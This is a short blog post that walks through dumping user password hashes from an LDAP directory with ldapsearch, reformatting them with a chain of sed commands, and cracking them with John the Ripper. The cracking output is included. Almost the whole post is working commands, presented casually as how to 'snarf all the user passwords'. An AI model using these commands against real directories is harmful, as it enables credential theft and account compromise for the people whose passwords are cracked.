Monday, February 1, 2016

dear john


ldapsearch -x -D "cn=bindAcct,dc=domain" -w bindpass -h 6.6.6.6 -b ou=users,dc=domain -LLL "(objectClass=shadowAccount)" userPassword > dearjohn \ <- query
sed -i '/^$/d' dearjohn \  <- remove blank lines
sed -i 's/,ou=users,dc=domain//g' dearjohn \ <- strip the domain from the user dn
sed -i 's/dn:\ uid=//g' dearjohn \ <- remove the user dn 
sed -i ':a;N;$!ba;s/\n/blast/g' dearjohn \  <- have fun with line breaks
sed -i 's/userPassword//g' dearjohn \  <- strip out attribute
sed -i 's/blast::\ /:/g' dearjohn \  <- format fun
sed -i 's/blast/\n/g' dearjohn \  <- bring the line breaks back
john dearjohn  
   
 Warning: only loading hashes of type "des", but also saw type "md5"  
 Use the "--format=md5" option to force loading hashes of that type instead  
 Loaded 26 password hashes with 26 different salts (Traditional DES [128/128 BS SSE2-16])  
 Remaining 25 password hashes with 25 different salts  
   
 ...  
 ...  
 ...  
and now you know how to connect to an ldap server and snarf all the user passwords, get them formatted for john the ripper using sed and then going about to crack them. the fun.
Post a Comment